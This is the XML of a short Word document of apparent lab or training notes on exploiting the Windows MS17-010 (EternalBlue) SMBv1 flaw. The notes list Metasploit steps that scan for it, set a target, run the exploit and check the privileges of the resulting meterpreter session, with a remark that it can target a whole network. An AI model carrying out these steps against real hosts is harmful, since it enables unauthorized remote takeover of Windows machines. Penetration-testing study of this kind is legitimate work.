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A861" w14:textId="2C1429E3" w:rsidR="00853ABF" w:rsidRPr="00235747" w:rsidRDefault="004C7E9E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Windows MS17-010 SMB Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C56033" w14:textId="2CF54C88" w:rsidR="004C7E9E" w:rsidRDefault="00235747">
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MS17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MS17-01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39032CBE" w14:textId="782B0300" w:rsidR="00235747" w:rsidRPr="00235747" w:rsidRDefault="00235747" w:rsidP="00235747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990F63F" w14:textId="7BA87FB3" w:rsidR="00235747" w:rsidRDefault="00235747"/>
    <w:p w14:paraId="2FB00EB0" w14:textId="6F2138A3" w:rsidR="004C7E9E" w:rsidRDefault="00235747">
      <w:r>
        <w:t>RCE attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C1CC4" w14:textId="030E2AA9" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is name of exploit that take advantage of Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MS17-010 SMB Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4658A41F" w14:textId="77777777" w:rsidR="0078386C" w:rsidRDefault="0078386C"/>
    <w:p w14:paraId="4DC3297F" w14:textId="02FAADB7" w:rsidR="00235747" w:rsidRPr="00235747" w:rsidRDefault="00056ED3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ethernalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0078386C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affect </w:t>
      </w:r>
      <w:r w:rsidR="00235747" w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability in window SMBV1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B0B87" w14:textId="77777777" w:rsidR="00235747" w:rsidRDefault="00235747"/>
    <w:p w14:paraId="6E8E9CC5" w14:textId="451A5D54" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7B4798" wp14:editId="24A0E29C">
            <wp:extent cx="3448800" cy="1584347"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9229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83215" name="Picture 922983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7" cy="15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24D6" w14:textId="77777777" w:rsidR="00235747" w:rsidRDefault="00235747"/>
    <w:p w14:paraId="3763E8D2" w14:textId="1A6835FF" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:r>
        <w:t>It has MSF module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45215C76" w14:textId="77777777" w:rsidR="00235747" w:rsidRDefault="00235747"/>
    <w:p w14:paraId="3FB32C11" w14:textId="787D8096" w:rsidR="00235747" w:rsidRPr="00235747" w:rsidRDefault="00235747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00235747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB1D619" w14:textId="3A570508" w:rsidR="00235747" w:rsidRDefault="00235747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88DE920" w14:textId="4FC6DA4E" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9CEABE" w14:textId="480968FF" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29E055E0" w14:textId="22392C5F" w:rsidR="00235747" w:rsidRDefault="00235747">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C073955" w14:textId="1793876A" w:rsidR="00235747" w:rsidRDefault="00235747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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B68FBBD" w14:textId="77777777" w:rsidR="00235747" w:rsidRDefault="00235747"/>
    <w:p w14:paraId="1CF02F7B" w14:textId="0C48E36A" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED2109" w14:textId="3773643C" w:rsidR="00DB63C3" w:rsidRPr="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB63C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB63C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uxiliary</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB63C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D3679F" w14:textId="77777777" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3"/>
    <w:p w14:paraId="6648D7FE" w14:textId="6247C500" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3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name:eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CC69E83" w14:textId="625B31D0" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Use(index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF385F" w14:textId="3E8BDFFC" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A9D29" w14:textId="77777777" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3"/>
    <w:p w14:paraId="07C815F6" w14:textId="14A77B3B" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47D3058C" w14:textId="306F173D" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t># you can also run this on the entire network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0465ED" w14:textId="4B6A2F28" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544EA7E3" w14:textId="77777777" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3"/>
    <w:p w14:paraId="3702D0AF" w14:textId="30245F0E" w:rsidR="004D083B" w:rsidRPr="004D083B" w:rsidRDefault="004D083B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D083B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541FE63" w14:textId="7E5F5BFF" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3" w:rsidP="00DB63C3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name:eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FE78591" w14:textId="59F16C41" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Use(index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58A3D8" w14:textId="106D6CD0" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t xml:space="preserve">Show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BA1DB" w14:textId="2E943E5B" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2421042E" w14:textId="49C0AFA6" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F1636" w14:textId="77777777" w:rsidR="00DB63C3" w:rsidRDefault="00DB63C3"/>
    <w:p w14:paraId="2407FE36" w14:textId="026A9114" w:rsidR="00756A15" w:rsidRDefault="00756A15">
      <w:r>
        <w:t xml:space="preserve"># get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05133870" w14:textId="3B85BC2C" w:rsidR="00756A15" w:rsidRDefault="00756A15">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E146D3E" w14:textId="27BCCB9B" w:rsidR="00756A15" w:rsidRDefault="00756A15">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C7F270" w14:textId="4208613E" w:rsidR="00756A15" w:rsidRDefault="00756A15">
      <w:r>
        <w:t># to check the current privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F01F4" w14:textId="77777777" w:rsidR="00756A15" w:rsidRDefault="00756A15"/>
    <w:sectPr w:rsidR="0075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EC"/>
    <w:rsid w:val="00056ED3"/>
    <w:rsid w:val="000F2633"/>
    <w:rsid w:val="00235747"/>
    <w:rsid w:val="004C7E9E"/>
    <w:rsid w:val="004D083B"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00756A15"/>
    <w:rsid w:val="0078386C"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00D913EC"/>
    <w:rsid w:val="00DB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6262"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0F43F9BF-69BB-4C31-BC97-B6E5586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78</Words>
  <Characters>659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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-06T05:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-06T05:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>